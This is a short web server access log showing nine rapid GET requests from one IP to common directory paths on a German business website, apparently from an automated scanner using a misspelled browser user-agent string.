13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /assets/ HTTP/1.1" 200 6626 "http://ipc-business.de/assets/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /blog/wp-admin/includes/ HTTP/1.1" 200 6626 "http://ipc-business.de/blog/wp-admin/includes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /cgi-bin/ HTTP/1.1" 403 2614 "http://ipc-business.de/cgi-bin/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /components/ HTTP/1.1" 200 6626 "http://ipc-business.de/components/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /css/ HTTP/1.1" 200 6626 "http://ipc-business.de/css/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /files/ HTTP/1.1" 200 6626 "http://ipc-business.de/files/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:40:00 +0100] "GET /home/ HTTP/1.1" 200 6626 "http://ipc-business.de/home/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:40:00 +0100] "GET /images/ HTTP/1.1" 200 6626 "http://ipc-business.de/images/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:40:00 +0100] "GET /include/ HTTP/1.1" 200 6626 "http://ipc-business.de/include/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
